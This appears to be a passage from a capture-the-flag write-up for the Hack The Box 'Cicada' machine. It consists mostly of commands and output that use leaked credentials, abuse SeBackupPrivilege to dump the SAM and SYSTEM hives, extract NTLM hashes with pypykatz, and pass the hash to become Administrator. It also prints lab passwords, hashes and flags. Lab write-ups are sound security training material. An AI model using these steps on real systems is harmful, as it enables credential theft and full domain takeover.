┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ nxc smb cicada.htb -u "david.orelious" -p 'aRt$Lp#7t*VQ!3' --shares
SMB 10.129.212.172 445 CICADA-DC [*] Windows Server 2022 Build 20348 x64 (name:CICADA-DC) (domain:cicada.htb) (signing:True) (SMBv1:False)
SMB 10.129.212.172 445 CICADA-DC [+] cicada.htb\david.orelious:aRt$Lp#7t*VQ!3
SMB 10.129.212.172 445 CICADA-DC [*] Enumerated shares
SMB 10.129.212.172 445 CICADA-DC Share Permissions Remark
SMB 10.129.212.172 445 CICADA-DC ----- ----------- ------
SMB 10.129.212.172 445 CICADA-DC ADMIN$ Remote Admin
SMB 10.129.212.172 445 CICADA-DC C$ Default share
SMB 10.129.212.172 445 CICADA-DC DEV READ
SMB 10.129.212.172 445 CICADA-DC HR READ
SMB 10.129.212.172 445 CICADA-DC IPC$ READ Remote IPC
SMB 10.129.212.172 445 CICADA-DC NETLOGON READ Logon server share
SMB 10.129.212.172 445 CICADA-DC SYSVOL READ Logon server share
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ smbclient //cicada.htb/DEV -U 'david.orelious%aRt$Lp#7t*VQ!3'
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Thu Mar 14 08:31:39 2024
.. D 0 Thu Mar 14 08:21:29 2024
Backup_script.ps1 A 601 Wed Aug 28 13:28:22 2024
4168447 blocks of size 4096. 438732 blocks available
smb: \> mget Backup_script.ps1
Get file Backup_script.ps1? y
getting file \Backup_script.ps1 of size 601 as Backup_script.ps1 (4.6 KiloBytes/sec) (average 4.6 KiloBytes/sec)
smb: \> exit
Read script: Backup_script.ps1
We see the next creds:
L: emily.oscars
P: Q!3@Lp#M6b*7t*Vt
---
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ cat Backup_script.ps1
$sourceDirectory = "C:\smb"
$destinationDirectory = "D:\Backup"
$username = "emily.oscars"
$password = ConvertTo-SecureString "Q!3@Lp#M6b*7t*Vt" -AsPlainText -Force
$credentials = New-Object System.Management.Automation.PSCredential($username, $password)
$dateStamp = Get-Date -Format "yyyyMMdd_HHmmss"
$backupFileName = "smb_backup_$dateStamp.zip"
$backupFilePath = Join-Path -Path $destinationDirectory -ChildPath $backupFileName
Compress-Archive -Path $sourceDirectory -DestinationPath $backupFilePath
Write-Host "Backup completed successfully. Backup file saved to: $backupFilePath"
Login as user: emily.oscars
┌──(kali㉿kali)-[~/Desktop/writeups/HTB/HTB_Cicada]
└─$ evil-winrm -i 10.129.212.172 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
Read flag: user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/23/2024 9:49 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> type user.txt
bd247f235abda77091bbd8ca71890b83
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1f6
IPv6 Address. . . . . . . . . . . : dead:beef::7e1:af7c:d586:5ae6
Link-local IPv6 Address . . . . . : fe80::cfc2:a7ed:b287:1fd0%6
IPv4 Address. . . . . . . . . . . : 10.129.212.172
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%6
10.129.0.1
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop>
Privilege Escalation
Found SeBackupPrivilege
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
=================== =============================================
cicada\emily.oscars S-1-5-21-917908876-1423158569-3159038727-1601
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Backup Operators Alias S-1-5-32-551 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
Download files: SAM and SYSTEM
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\sam C:\Users\emily.oscars.CICADA\Desktop\sam
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> reg save hklm\system C:\Users\emily.oscars.CICADA\Desktop\system
The operation completed successfully.
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> dir
Directory: C:\Users\emily.oscars.CICADA\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 11/24/2024 7:40 PM 49152 sam
-a---- 11/24/2024 7:40 PM 18558976 system
-ar--- 11/23/2024 9:49 PM 34 user.txt
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download sam
Info: Downloading C:\Users\emily.oscars.CICADA\Desktop\sam to sam
Info: Download successful!
*Evil-WinRM* PS C:\Users\emily.oscars.CICADA\Desktop> download system
Info: Downloading C:\Users\emily.oscars.CICADA\Desktop\system to system
Info: Download successful!
Extract the NTLM hashes from SAM and SYSTEM files
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Cicada/pypykatz]
└─$ pypykatz registry --sam ../sam ../system
/usr/lib/python3/dist-packages/pypykatz/_version.py:11: SyntaxWarning: invalid escape sequence '\.'
"""
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 3c2b033757a49110a9ee680b46e8d620
============== SAM hive secrets ==============
HBoot Key: a1c299e572ff8c643a857d3fdb3e5c7c10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:2b87e7c93a3e8a0ea4a581937016f341:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Login as user: Administrator
┌──(kali㉿kali)-[~/…/writeups/HTB/HTB_Cicada/pypykatz]
└─$ evil-winrm -i 10.129.212.172 -u Administrator -H "2b87e7c93a3e8a0ea4a581937016f341"
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
cicada\administrator
Read flag: root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 11/23/2024 9:49 PM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
328abd46880ad9e16107a04355bae504
*Evil-WinRM* PS C:\Users\Administrator\Desktop> whoami /all
USER INFORMATION
----------------
User Name SID
==================== ============================================
cicada\administrator S-1-5-21-917908876-1423158569-3159038727-500
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
============================================= ================ ============================================ ===============================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Administrators Alias S-1-5-32-544 Mandatory group, Enabled by default, Enabled group, Group owner
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Certificate Service DCOM Access Alias S-1-5-32-574 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
CICADA\Group Policy Creator Owners Group S-1-5-21-917908876-1423158569-3159038727-520 Mandatory group, Enabled by default, Enabled group
CICADA\Domain Admins Group S-1-5-21-917908876-1423158569-3159038727-512 Mandatory group, Enabled by default, Enabled group
CICADA\Schema Admins Group S-1-5-21-917908876-1423158569-3159038727-518 Mandatory group, Enabled by default, Enabled group
CICADA\Enterprise Admins Group S-1-5-21-917908876-1423158569-3159038727-519 Mandatory group, Enabled by default, Enabled group
CICADA\Denied RODC Password Replication Group Alias S-1-5-21-917908876-1423158569-3159038727-572 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ============================================================== =======
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeMachineAccountPrivilege Add workstations to domain Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeEnableDelegationPrivilege Enable computer and user accounts to be trusted for delegation Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
USER CLAIMS INFORMATION
-----------------------
User claims unknown.
Kerberos support for Dynamic Access Control on this device has been disabled.
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::1f6
IPv6 Address. . . . . . . . . . . : dead:beef::7e1:af7c:d586:5ae6
Link-local IPv6 Address . . . . . : fe80::cfc2:a7ed:b287:1fd0%6
IPv4 Address. . . . . . . . . . . : 10.129.212.172
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb9:7437%6
10.129.0.1
*Evil-WinRM* PS C:\Users\Administrator\Desktop>
References
[Windows Privilege Escalation: SeBackupPrivilege](https://www.hackingarticles.in/windows-privilege-escalation-sebackupprivilege/)
[pypykatz](https://github.com/skelsec/pypykatz)
Lessons Learned